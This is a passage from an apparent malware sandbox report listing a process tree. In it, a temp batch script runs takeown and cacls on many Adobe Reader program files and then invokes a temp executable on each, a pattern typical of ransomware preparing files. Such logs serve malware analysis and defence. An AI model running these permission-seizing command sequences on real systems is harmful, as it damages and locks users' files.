  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp""
  2⤵
  PID:1292
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C
    3⤵
    PID:1000
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"
    3⤵
    - Modifies file permissions
    PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "eng.hyp" -nobanner
    3⤵
    PID:1840
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "eng.hyp" -nobanner
      4⤵
      PID:1736
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1360
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""
  2⤵
  PID:1568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C
    3⤵
    PID:1268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"
    3⤵
    - Modifies file permissions
    PID:932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "zdingbat.txt" -nobanner
    3⤵
    PID:1888
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "zdingbat.txt" -nobanner
      4⤵
      PID:820
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1392
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""
  2⤵
  PID:1332
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C
    3⤵
    PID:1256
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"
    3⤵
    - Modifies file permissions
    PID:1952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "TURKISH.TXT" -nobanner
    3⤵
    PID:1864
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "TURKISH.TXT" -nobanner
      4⤵
      PID:1628
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1132
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""
  2⤵
  PID:1572
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C
    3⤵
    PID:1840
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "bl.gif" -nobanner
    3⤵
    PID:1004
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "bl.gif" -nobanner
      4⤵
      PID:1520
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1932
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""
  2⤵
  PID:1492
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C
    3⤵
    PID:320
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"
    3⤵
    - Modifies file permissions
    PID:1392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "forms_super.gif" -nobanner
    3⤵
    PID:1568
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "forms_super.gif" -nobanner
      4⤵
      PID:472
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1384
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""
  2⤵
  PID:1836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"
    3⤵
    PID:1000
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "review_browser.gif" -nobanner
    3⤵
    PID:752
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "review_browser.gif" -nobanner
      4⤵
      PID:1416
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1660
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""
  2⤵
  PID:1912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C
    3⤵
    PID:1004
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "tl.gif" -nobanner
    3⤵
    PID:1572
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "tl.gif" -nobanner
      4⤵
      PID:1044
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:592
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""
  2⤵
  PID:1664
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "Identity-V" -nobanner
    3⤵
    PID:1492
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "Identity-V" -nobanner
      4⤵
      PID:1844
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1432
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""
  2⤵
  PID:1824
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"
    3⤵
    PID:1840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "MyriadPro-Bold.otf" -nobanner
    3⤵
    PID:384
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "MyriadPro-Bold.otf" -nobanner
      4⤵
      PID:1032
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:684
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""
  2⤵
  PID:932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C
    3⤵
    PID:1572
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"
    3⤵
    PID:320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "SC_Reader.exe" -nobanner
    3⤵
    PID:1056
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "SC_Reader.exe" -nobanner
      4⤵
      PID:1796
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1880
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""
  2⤵
  PID:1256
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C
    3⤵
    PID:1888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"
    3⤵
    - Modifies file permissions
    PID:1864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "brt55.ths" -nobanner
    3⤵
    PID:1528
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "brt55.ths" -nobanner
      4⤵
      PID:2024
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1900
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""
  2⤵
  PID:1840
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C
    3⤵
    PID:1836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"
    3⤵
    - Modifies file permissions
    PID:1932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "usa03.hsp" -nobanner
    3⤵
    PID:1332
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "usa03.hsp" -nobanner
      4⤵
      PID:1416
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1812
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""
  2⤵
  PID:320
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C
    3⤵
    PID:1796
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "CYRILLIC.TXT" -nobanner
    3⤵
    PID:1044
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "CYRILLIC.TXT" -nobanner
      4⤵
      PID:1736
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1132
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT""
  2⤵
  PID:1864
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G Admin:F /C
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"
    3⤵
    PID:1660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "CP1252.TXT" -nobanner
    3⤵
    PID:1844
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "CP1252.TXT" -nobanner
      4⤵
      PID:1940
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:384
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""
  2⤵
  PID:1932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "pmd.cer" -nobanner
    3⤵
    PID:1240
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "pmd.cer" -nobanner
      4⤵
      PID:1276
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1316
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""
  2⤵
  PID:1384
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C
    3⤵
    PID:820
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"
    3⤵
    PID:1432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "email_initiator.gif" -nobanner
    3⤵
    PID:1912
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "email_initiator.gif" -nobanner
      4⤵
      PID:1108
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1628
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""
  2⤵
  PID:1660
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"
    3⤵
    PID:952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "pdf.gif" -nobanner
    3⤵
    PID:472
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "pdf.gif" -nobanner
      4⤵
      PID:2040
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1292
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""
  2⤵
  PID:1392
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C
    3⤵
    PID:1840
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "server_issue.gif" -nobanner
    3⤵
    PID:1416
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "server_issue.gif" -nobanner
      4⤵
      PID:304
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1044
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""
  2⤵
  PID:320
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"
    3⤵
    PID:1628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
    3⤵
    PID:1384
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
      4⤵
      PID:908
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1844
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""
  2⤵
  PID:1360
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C
    3⤵
    PID:472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "CourierStd.otf" -nobanner
    3⤵
    PID:1256
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "CourierStd.otf" -nobanner
      4⤵
      PID:1268
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1240
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""
  2⤵
  PID:1932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C
    3⤵
    PID:1416
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"
    3⤵
    - Modifies file permissions
    PID:820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "zx______.pfm" -nobanner
    3⤵
    PID:364
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "zx______.pfm" -nobanner
      4⤵
      PID:1952
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1664
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""
  2⤵
  PID:240
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"
    3⤵
    - Modifies file permissions
    PID:1916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner
    3⤵
    PID:948
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner
      4⤵
      PID:752
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1812
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""
  2⤵
  PID:1408
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C
    3⤵
    PID:1256
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"
    3⤵
    PID:1840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "can32.clx" -nobanner
    3⤵
    PID:1936
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "can32.clx" -nobanner
      4⤵
      PID:1572
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1492
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""
  2⤵
  PID:592
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C
    3⤵
    PID:364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "symbol.txt" -nobanner
    3⤵
    PID:1060
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "symbol.txt" -nobanner
      4⤵
      PID:1888
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""
  2⤵
  PID:1108
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C
    3⤵
    PID:948
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"
    3⤵
    PID:472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "SYMBOL.TXT" -nobanner
    3⤵
    PID:1836
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "SYMBOL.TXT" -nobanner
      4⤵
      PID:684
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1256
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""
  2⤵
  PID:1472
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"
    3⤵
    PID:1268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "br.gif" -nobanner
    3⤵
    PID:820
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "br.gif" -nobanner
      4⤵
      PID:1528
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:364
- C:\Windows\SysWOW64\cmd.exe
